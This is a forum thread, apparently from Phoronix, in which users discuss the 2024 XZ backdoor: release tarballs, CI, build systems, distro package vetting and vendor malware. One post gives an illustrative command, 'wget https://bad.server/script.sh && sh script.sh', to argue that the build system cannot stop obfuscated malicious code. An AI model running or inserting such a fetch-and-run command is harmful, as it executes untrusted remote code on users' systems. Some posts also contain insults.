Announcement

**tesfabpel** · 29 March 2024, 01:14 PM

Originally posted by darkbasic View Post

It's the *source* tarball which contains the final piece of the malicious code, not the binaries. It's no coincidence that starting from today Arch Linux switched to the git tag lol

Probably it's the extra assets that are published in the release page on GitHub (the ones called differently than "Source Code (zip)" and "Source Code (tar.gz)") since the standard two are downloading from ".../archive/refs/tags/v5.6.1.{tar.gz,.zip}" instead of ".../releases/download/v5.6.1/xz-5.6.1.{tar.gz,.zip}".

Probably the ones from "refs/tags" are built automatically by GitHub when downloading them (they don't even have the size visible in the page).

immagine.png

**RealNC** · 29 March 2024, 01:17 PM

Why don't they use CI to create the release tarballs? Or do they? CI infra compromised then?

**bug77** · 29 March 2024, 01:24 PM

Originally posted by avis View Post

Almost all distros, aside from maybe RHEL, rush to push upstream packages without ever verifying that the source code has not been tampered with.

...

This is not an XZ issue. This is the issue of the entire Linux ecosystem. The issue of safety, security, trust and verifiability.

The ecosystem is fine tyvm.

"Almost all distros" do not rush to push the latest and greatest. Even rolling releases have unstable and testing repositories. Enterprise grade distributions are based on consumer facing counterparts that validate packages further. It's actually a very healthy setup. This was injected on Feb 24 and fixed a few days over a month later. That's pretty good in my book.

**Volta** · 29 March 2024, 01:25 PM

Originally posted by avis

roliverio

There have been zero instanced of Microsoft/Apple/Google distributing malware in their entire 30+ years history. If you're concerned about "telemetry" it's different. It doesn't allow these companies to fuck with your systems or gain unauthorized access like in this situation.

Yeah fking right!

Be careful the next time you download a game off the Microsoft Store on Windows, as there's dangerous malware hiding in clones of several popular games. Before you download anything, make sure it's the actual app and not a fake.

According to the security research firm Check Point (via Bleeping Computer), there are clones of popular games like Temple Run and Subway Surfers appearing on the Microsoft Store that contain the Electron Bot malware.

The malware is a backdoor that gives the attacker complete control over infected machines with the goal of social media promotion and click fraud through Facebook, Google, YouTube, and Sound Cloud.

Good luck checking their code!

Oh, so called 'telemetry' is a malware introduced by vendor himself.

**bug77** · 29 March 2024, 01:27 PM

Originally posted by avis

roliverio

Blacklisted immediately and goodbye. There have been zero instanced of Microsoft/Apple/Google distributing malware in their entire 30+ years history. If you're concerned about "telemetry" it's different. It doesn't allow these companies to fuck with your systems or gain unauthorized access like in this situation.

You probably missed the days when developers were urging Microsoft to keep VB out of the Office suite. They didn't and created a prime vector for a whole new generation of malware that did not exist before.

**avis** · 29 March 2024, 01:32 PM

Originally posted by bug77 View Post

You probably missed the days when developers were urging Microsoft to keep VB out of the Office suite. They didn't and created a prime vector for a whole new generation of malware that did not exist before.

This is 100% unrelated and VB was a single toggle to switch/disable and not deal with possibly malicious macros, if you ever were concerned about this attack vector.

That roliverio guy heavily implied and joked about MS/Apple/Google actually distributing malware (an interpreter is not malware cause otherwise a compiler in your distro is ALSO an attack vector and Python gets installed by default in pretty much in all distros) and I'm sad these companies won't sue him for libel.

**archkde** · 29 March 2024, 01:34 PM

Originally posted by RealNC View Post

Why don't they use CI to create the release tarballs? Or do they? CI infra compromised then?

Now if they used a build system that doesn't require running random binaries distributed in the "source" tarball, this kind of "release tarballs" would not be needed at all.

**archkde** · 29 March 2024, 01:35 PM

Originally posted by uxmkt

You dense MF. They would have done the same, just with different syntax.

No, because with CMake you only run the source code, not random binaries.

**oibaf** · 29 March 2024, 01:36 PM

All the details are here: https://lwn.net/ml/oss-security/2024...3.anarazel.de/

**avis** · 29 March 2024, 01:39 PM

Originally posted by archkde View Post

No, because with CMake you only run the source code, not random binaries.

The build system is irrelevant. You can obfuscate whatever you want and run wget https://bad.server/script.sh && sh script.sh and do whatever you please.

All the code Linux distros include must be manually inspected (and run through automated systems as well, since people don't always catch/see everything) and verified for being safe, period.

Announcement

XZ Struck By Malicious Code That Could Allow Unauthorized Remote System Access

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment